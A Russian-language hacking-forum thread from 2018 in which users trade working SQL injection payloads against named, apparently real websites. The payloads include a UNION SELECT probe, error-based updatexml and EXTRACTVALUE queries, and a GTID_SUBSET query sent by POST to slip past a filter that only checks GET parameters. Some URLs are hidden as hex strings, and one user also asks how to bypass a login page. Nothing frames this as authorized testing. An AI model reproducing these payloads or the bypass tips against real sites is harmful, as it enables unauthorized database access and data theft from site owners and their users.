 |
|

23.04.2018, 17:10
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от Muracha
↑
Спасибо, почему на конце
-- 1
? А не -- или /*
Потому что советую коментарий ставить, а после него ещё символ любой, Заметь, многие делают +--+-
Сообщение от BabaDook
↑
Помогите пожалуйста, никак не могу сделать это
Код:
http://www.alphaonenow.org/story.php?news_id=2 UnIoN select 1,2,3+--+-
Никак не могу получить вывод.
Эх, никто таки сделал.Вопрос закрыт
|
|
|

23.04.2018, 17:31
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами:
5025206
Репутация:
5
|
|
Сообщение от BabaDook
↑
Потому что советую коментарий ставить, а после него ещё символ любой, Заметь, многие делают +--+-
Эх, никто таки сделал.Вопрос закрыт
http://www.alphaonenow.org/searchresults.php
В поиске 'and updatexml(NULL,concat(0x0a,(SELECT 1)),Null)--'
|
|
|

23.04.2018, 17:37
|
|
Новичок
Регистрация: 16.10.2015
Сообщений: 21
С нами:
5566646
Репутация:
7
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]window.location.href='home.php';"[/COLOR][COLOR="#007700"]; } else { [/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Invalid Username or password !"[/COLOR][COLOR="#007700"]; } } [/COLOR][COLOR="#FF8000"]/*-------------------------End of login----------------------------------------------------*/ [/COLOR][COLOR="#0000BB"]?> [/COLOR] [COLOR="#0000BB"][/COLOR] User Name [/COLOR]" class="textbox" style="width:150px"/> Password [/COLOR]" class="textboxpwd" style="width:150px"/> [/COLOR]
Есть возможность обойти ?
|
|
|

23.04.2018, 17:56
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами:
5745206
Репутация:
1
|
|
Сообщение от BabaDook
↑
Помогите пожалуйста, никак не могу сделать это
Код:
http://www.alphaonenow.org/story.php?news_id=2 UnIoN select 1,2,3+--+-
Никак не могу получить вывод.
загугли sql injection
|
|
|

25.04.2018, 19:07
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Помогите пожалуйста:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]0x676a72656e74616c732e636f6d2f72656e74616c5f64657461696c732e7068703f69643d33392b554e694f6e2b53654c4563542b312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c3236[/COLOR][/COLOR]
|
|
|

25.04.2018, 20:52
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
С нами:
8859263
Репутация:
334
|
|
Сообщение от BabaDook
↑
Помогите пожалуйста:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]0x676a72656e74616c732e636f6d2f72656e74616c5f64657461696c732e7068703f69643d33392b554e694f6e2b53654c4563542b312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c3236[/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]0x687474703a2f2f676a72656e74616c732e636f6d2f72656e74616c5f64657461696c732e7068703f69643d312b414e442b4558545241435456414c55452832322c434f4e43415428307835632c2876657273696f6e28292929292b2d2d2b2d[/COLOR][/COLOR]
|
|
|

25.04.2018, 20:55
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от Jerri
↑
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]0x687474703a2f2f676a72656e74616c732e636f6d2f72656e74616c5f64657461696c732e7068703f69643d312b414e442b4558545241435456414c55452832322c434f4e43415428307835632c2876657273696f6e28292929292b2d2d2b2d[/COLOR][/COLOR]
Спасибо братан
|
|
|

26.04.2018, 03:00
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от BabaDook
↑
Помогите пожалуйста, никак не могу сделать это
Код:
http://www.alphaonenow.org/story.php?news_id=2 UnIoN select 1,2,3+--+-
Никак не могу получить вывод.
Отправляй через POST. Там видимо $_REQUEST['news_id'].
Код:
http://www.alphaonenow.org/story.php
POST: news_id = 4341 and GTID_SUBSET((SELECT database()),0)-- a
Слово "select" хорошо фильтруется, но жаль, что фильтр работает только на GET-параметрах.
|
|
|

26.04.2018, 06:27
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
|
|
|

26.04.2018, 11:51
|
|
Флудер
Регистрация: 19.06.2015
Сообщений: 4,123
С нами:
5738006
Репутация:
147
|
|
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|